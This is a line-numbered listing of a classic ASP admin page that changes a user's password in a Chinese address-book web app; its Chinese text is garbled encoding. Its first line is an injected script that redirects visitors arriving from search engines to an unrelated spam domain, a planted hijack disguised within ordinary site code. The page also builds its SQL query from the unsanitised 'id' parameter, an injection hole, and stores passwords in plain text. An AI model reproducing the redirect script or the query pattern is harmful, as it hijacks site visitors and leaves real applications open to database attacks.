d:\wwwroot\wuchunhua\ͨѶ¼\admin\user_edit_ok.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!-- #include file="chk.asp" -->
002:
<!-- #include file="conn.asp" -->
003:
<%
004:
Dim id,pwd
005:
id=Request("id")
006:
pwd=Trim(Request("pwd"))
007:
008:
set rs=server.createobject("adodb.recordset")
009:
rs.Open "Select * from [user] where id="&id,conn,1,3
010:
if rs.bof or rs.Eof then
011:
Response.Redirect "../error.asp?id=ûÓÐÄúÌá½»µÄÓû§Êý¾ÝÐÅÏ¢,¿ÉÄÜÄúÒѾɾ³ýÁ˸ÃÓû§¶øÃ»ÓÐË¢ÐÂÄúµÄÍøÒ³£¡"
012:
Else
013:
rs("pwd")=pwd
014:
rs.Update
015:
End if
016:
rs.Close
017:
Set rs=nothing
018:
Response.Write "¸ÃÓû§ÃÜÂëÐ޸ijɹ¦£¡"
019:
%
>
020:
021: